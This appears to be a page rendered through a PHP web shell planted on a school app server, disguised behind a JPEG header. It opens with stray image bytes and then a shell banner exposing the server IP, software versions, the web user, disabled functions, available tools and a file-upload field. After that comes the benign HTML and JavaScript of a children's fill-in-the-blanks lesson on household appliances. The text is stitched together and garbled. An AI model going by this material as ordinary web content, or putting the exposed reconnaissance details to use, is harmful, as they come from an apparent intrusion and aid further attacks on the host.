????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.221.79.24 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelF/Category2/ |
Upload File : |
<!doctype html> <html> <head> <title>Fill in the blanks</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.F, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.F, Category.No2, 42), true, true); shared_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3', 'id_td_heading4', 'id_td_heading5']; var ids_options = ['id_options', 'id_td_clothes', 'id_td_safe', 'id_td_tool', 'id_td_water', 'id_td_heating', 'id_td_cool', 'id_td_cooking']; var ids_spans = ['id_span_clothes', 'id_span_safe', 'id_span_tool', 'id_span_water', 'id_span_heating', 'id_span_cool', 'id_span_cooking']; var ids_boxes = ['id_dropboxCooking', 'id_dropboxHeating', 'id_dropboxClothes', 'id_dropboxWater', 'id_dropboxSafe', 'id_dropboxCool', 'id_dropboxTool']; var ids_texts = new Array(); for (var textId = 1; textId <= 34; textId++) { ids_texts.push('id_td_text' + textId); } var ids_textBoxes = new Array(); var ids_td_textboxes = new Array(); for (var textBoxId = 1; textBoxId <= 13; textBoxId++) { var idTdTextBox = 'id_td_textBox' + textBoxId; var idTextBox = 'id_textBox' + textBoxId; var eTextBox = document.getElementById(idTextBox); eTextBox.value = ''; if (shared_currentDeviceType == shared_DeviceTypeAndroid) { eTextBox.style.border = 'solid 2px black'; } ids_textBoxes.push(idTextBox); ids_td_textboxes.push(idTdTextBox); } var ids_All = ids_headings.concat(ids_options, ids_boxes); shared_adjust_fontSize_for_ids_all_devices(ids_All, 70); shared_adjust_fontSize_for_ids_all_devices(ids_texts, 65); shared_adjust_fontSize_for_ids_all_devices(ids_td_textboxes, 60); shared_adjust_fontSize_for_ids_all_devices(ids_textBoxes, 60); shared_init_dropBox_tds_withOUT_drag_here(ids_boxes); shared_init_dropping_spans(ids_spans); var id_tables_array = ['id_table1', 'id_table2', 'id_table3', 'id_table4', 'id_table5']; shared_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { } function btnHome_click() { shared_btnHomeCategories_click('LevelF'); } function btnPrevious_click() { window.location = 'LevelFCat2Lesson41.html'; } function btnNext_click() { window.location = 'LevelFCat2Lesson43.html'; } function DragDrop(id_dropBox, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function btnValidate_click() { var ids_boxes = ['id_dropboxCooking', 'id_dropboxHeating', 'id_dropboxClothes', 'id_dropboxWater', 'id_dropboxSafe', 'id_dropboxCool', 'id_dropboxTool']; var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes); var eTextBox1 = document.getElementById('id_textBox1'); var eTextBox2 = document.getElementById('id_textBox2'); var eTextBox3 = document.getElementById('id_textBox3'); var eTextBox4 = document.getElementById('id_textBox4'); var eTextBox5 = document.getElementById('id_textBox5'); var eTextBox6 = document.getElementById('id_textBox6'); var eTextBox7 = document.getElementById('id_textBox7'); var eTextBox8 = document.getElementById('id_textBox8'); var eTextBox9 = document.getElementById('id_textBox9'); var eTextBox10 = document.getElementById('id_textBox10'); var eTextBox11 = document.getElementById('id_textBox11'); var eTextBox12 = document.getElementById('id_textBox12'); var eTextBox13 = document.getElementById('id_textBox13'); if (isAllBoxesFilled && (eTextBox1.value !== '') && (eTextBox2.value !== '') && (eTextBox3.value !== '') && (eTextBox4.value !== '') && (eTextBox5.value !== '') && (eTextBox6.value !== '') && (eTextBox7.value !== '') && (eTextBox8.value !== '') && (eTextBox9.value !== '') && (eTextBox10.value !== '') && (eTextBox11.value !== '') && (eTextBox12.value !== '') && (eTextBox13.value !== '')) { shared_show_claps_animation('shared_id_div_claps_image'); } } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0"> <tr height="4%"> <td style="padding-bottom:0px"> <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent">Answer the following: </td> </tr> </table> </td> </tr> <tr height="16%"> <td style="padding-bottom:0px"> <table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="20%"> <td id="id_td_heading2" class="shared_style_blue_24px_bold_padding_left_2_percent">1. Enter the 2 uses of refrigerator:</td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="50%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text1" class="shared_style_black_24px_bold_padding_left_2_percent" width="40%" align="left"><span style="color:blue">A:</span> Refrigerator helps to</td> <td id="id_td_textBox1" width="20%" align="center"> <textarea id="id_textBox1" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text2" class="shared_style_black_24px_bold_padding_left_2_percent" width="*" align="left">. for longer time. We</td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text3" class="shared_style_black_24px_bold_padding_left_2_percent" width="22%" align="left" style="padding-left:6%">can make</td> <td id="id_td_textBox2" width="20%" align="center"> <textarea id="id_textBox2" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text4" class="shared_style_black_24px_bold" width="9%" align="center">and</td> <td id="id_td_textBox3" width="20%" align="center"> <textarea id="id_textBox3" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text5" class="shared_style_black_24px_bold_padding_left_2_percent" width="*" align="left">in freezer.</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="22%"> <td style="padding-bottom:0px"> <table id="id_table3" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="20%"> <td id="id_td_heading3" class="shared_style_blue_24px_bold_padding_left_2_percent">2. Enter the 2 uses of washing machine:</td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="33%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text6" class="shared_style_black_24px_bold_padding_left_2_percent" width="56%" align="left"><span style="color:blue">A:</span> Washing machine is helpful to</td> <td id="id_td_textBox4" width="20%" align="center"> <textarea id="id_textBox4" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text7" class="shared_style_black_24px_bold" width="4%" align="left">,</td> <td id="id_td_textBox5" width="20%" align="center"> <textarea id="id_textBox5" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text8" class="shared_style_black_24px_bold" width="*" align="left">,</td> </tr> </table> </td> </tr> <tr height="33%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text9" class="shared_style_black_24px_bold_padding_left_2_percent" width="22%" align="left" style="padding-left:6%">rinse and</td> <td id="id_td_textBox6" width="20%" align="center"> <textarea id="id_textBox6" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text10" class="shared_style_black_24px_bold" width="*" align="center">the clothes. It is very helpful to save</td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_textBox7" width="25%" align="center" style="padding-left:6%"> <textarea id="id_textBox7" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text11" class="shared_style_black_24px_bold" width="10%" align="center">and</td> <td id="id_td_textBox8" width="20%" align="center"> <textarea id="id_textBox8" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text12" class="shared_style_black_24px_bold_padding_left_2_percent" width="*" align="left">.</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="22%"> <td style="padding-bottom:0px"> <table id="id_table4" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="20%"> <td id="id_td_heading4" class="shared_style_blue_24px_bold_padding_left_2_percent">3. Enter the 2 uses of mixer and grinder:</td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="33%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text13" class="shared_style_black_24px_bold_padding_left_2_percent" width="58%" align="left"><span style="color:blue">A:</span> Mixer and grinder useful to make</td> <td id="id_td_textBox9" width="19%" align="center"> <textarea id="id_textBox9" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text14" class="shared_style_black_24px_bold" width="2%" align="left">,</td> <td id="id_td_textBox10" width="19%" align="center"> <textarea id="id_textBox10" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text15" class="shared_style_black_24px_bold" width="*" align="left">,</td> </tr> </table> </td> </tr> <tr height="33%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text16" class="shared_style_black_24px_bold_padding_left_2_percent" width="12%" align="left" style="padding-left:6%">and</td> <td id="id_td_textBox11" width="20%" align="center"> <textarea id="id_textBox11" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text17" class="shared_style_black_24px_bold" width="*" align="center">of different ingredients. It is also useful to</td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text18" class="shared_style_black_24px_bold_padding_left_2_percent" width="15%" align="left" style="padding-left:6%">make</td> <td id="id_td_textBox12" width="20%" align="center"> <textarea id="id_textBox12" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text19" class="shared_style_black_24px_bold" width="10%" align="center">and</td> <td id="id_td_textBox13" width="20%" align="center"> <textarea id="id_textBox13" class="shared_style_blue_24px_bold" style="width:90%; text-align:center; resize:none" rows="1"> </textarea> </td> <td id="id_td_text20" class="shared_style_black_24px_bold_padding_left_2_percent" width="*" align="left">juices.</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table id="id_table5" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="10%"> <td id="id_td_heading5" class="shared_style_blue_24px_bold_padding_left_2_percent">Fill in the blanks:</td> </tr> <tr height="20%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_options" class="shared_style_blue_24px_bold_padding_left_2_percent" width="15%">Options:</td> <td width="*"> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr height="50%"> <td id="id_td_clothes" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_clothes">clothes</span> </td> <td id="id_td_safe" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_safe">safe</span> </td> <td id="id_td_tool" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_tool">tool</span> </td> <td id="id_td_water" class="shared_style_red_24px_bold" width="*" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_water">water</span> </td> </tr> <tr height="50%"> <td id="id_td_heating" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_heating">heating</span> </td> <td id="id_td_cool" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_cool">cool</span> </td> <td id="id_td_cooking" class="shared_style_red_24px_bold" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_cooking">cooking</span> </td> <td id="id_td_text21" width="*"> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr height="16.6%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text22" class="shared_style_black_24px_bold_padding_left_2_percent" width="40%">1. Micro oven is useful to</td> <td id="id_dropboxCooking" class="shared_style_red_24px_bold" width="12%" align="center" ondragover="shared_highlight('id_dropboxCooking'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxCooking')" ondrop="DragDrop('id_dropboxCooking', ['id_span_cooking', 'id_span_heating'])">_______</td> <td id="id_td_text23" class="shared_style_black_24px_bold_padding_left_2_percent" width="10%">and</td> <td id="id_dropboxHeating" class="shared_style_red_24px_bold" width="12%" align="center" ondragover="shared_highlight('id_dropboxHeating'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxHeating')" ondrop="DragDrop('id_dropboxHeating', ['id_span_cooking', 'id_span_heating'])">_______</td> <td id="id_td_text24" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">the food quickly.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropboxClothes" height="16.6%" ondragover="shared_highlight('id_dropboxClothes'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxClothes')" ondrop="DragDrop('id_dropboxClothes', ['id_span_clothes'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text25" class="shared_style_black_24px_bold_padding_left_2_percent" width="60%">2. Iron is useful to give good look to the</td> <td id="id_dropboxClothes" class="shared_style_red_24px_bold" width="12%" align="center">_______</td> <td id="id_td_text26" class="shared_style_black_24px_bold" width="*">.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropboxWater" height="16.6%" ondragover="shared_highlight('id_dropboxWater'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxWater')" ondrop="DragDrop('id_dropboxWater', ['id_span_water'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text27" class="shared_style_black_24px_bold_padding_left_2_percent" width="68%">3. Air cooler cools the temperature by using</td> <td id="id_dropboxWater" class="shared_style_red_24px_bold" width="12%" align="center">_______</td> <td id="id_td_text28" class="shared_style_black_24px_bold" width="*">.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropboxSafe" height="16.6%" ondragover="shared_highlight('id_dropboxSafe'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxSafe')" ondrop="DragDrop('id_dropboxSafe', ['id_span_safe'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text29" class="shared_style_black_24px_bold_padding_left_2_percent" width="50%">4. Water purifier makes the water</td> <td id="id_dropboxSafe" class="shared_style_red_24px_bold" width="12%" align="center">_______</td> <td id="id_td_text30" class="shared_style_black_24px_bold_padding_left_2_percent" width="*">to drink.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropboxCool" height="16.6%" ondragover="shared_highlight('id_dropboxCool'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxCool')" ondrop="DragDrop('id_dropboxCool', ['id_span_cool'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text31" class="shared_style_black_24px_bold_padding_left_2_percent" width="51%">5. Air conditioner makes the room</td> <td id="id_dropboxCool" class="shared_style_red_24px_bold" width="12%" align="center">_______</td> <td id="id_td_text32" class="shared_style_black_24px_bold" width="*">.</td> </tr> </table> </td> </tr> <tr id="id_tr_dropboxTool" height="*" ondragover="shared_highlight('id_dropboxTool'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropboxTool')" ondrop="DragDrop('id_dropboxTool', ['id_span_tool'])"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_td_text33" class="shared_style_black_24px_bold_padding_left_2_percent" width="51%">6. Vacuum cleaner is a cleaning</td> <td id="id_dropboxTool" class="shared_style_red_24px_bold" width="12%" align="center">_______</td> <td id="id_td_text34" class="shared_style_black_24px_bold" width="*">.</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_clothes', {handle : 'id_td_clothes', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_safe', {handle : 'id_td_safe', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_tool', {handle : 'id_td_tool', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_water', {handle : 'id_td_water', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_heating', {handle : 'id_td_heating', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_cool', {handle : 'id_td_cool', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_cooking', {handle : 'id_td_cooking', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_dropboxCooking', {onOver : function(){shared_highlight('id_dropboxCooking')}, onOut : function(){shared_un_highlight('id_dropboxCooking')}, onDrop : function(){DragDrop('id_dropboxCooking', ['id_span_heating', 'id_span_cooking'])}}); webkit_drop.add('id_dropboxHeating', {onOver : function(){shared_highlight('id_dropboxHeating')}, onOut : function(){shared_un_highlight('id_dropboxHeating')}, onDrop : function(){DragDrop('id_dropboxHeating', ['id_span_heating', 'id_span_cooking'])}}); webkit_drop.add('id_tr_dropboxClothes', {onOver : function(){shared_highlight('id_dropboxClothes')}, onOut : function(){shared_un_highlight('id_dropboxClothes')}, onDrop : function(){DragDrop('id_dropboxClothes', ['id_span_clothes'])}}); webkit_drop.add('id_tr_dropboxWater', {onOver : function(){shared_highlight('id_dropboxWater')}, onOut : function(){shared_un_highlight('id_dropboxWater')}, onDrop : function(){DragDrop('id_dropboxWater', ['id_span_water'])}}); webkit_drop.add('id_tr_dropboxSafe', {onOver : function(){shared_highlight('id_dropboxSafe')}, onOut : function(){shared_un_highlight('id_dropboxSafe')}, onDrop : function(){DragDrop('id_dropboxSafe', ['id_span_safe'])}}); webkit_drop.add('id_tr_dropboxCool', {onOver : function(){shared_highlight('id_dropboxCool')}, onOut : function(){shared_un_highlight('id_dropboxCool')}, onDrop : function(){DragDrop('id_dropboxCool', ['id_span_cool'])}}); webkit_drop.add('id_tr_dropboxTool', {onOver : function(){shared_highlight('id_dropboxTool')}, onOut : function(){shared_un_highlight('id_dropboxTool')}, onDrop : function(){DragDrop('id_dropboxTool', ['id_dropboxTool', 'id_span_tool'])}}); </script> </body> </html>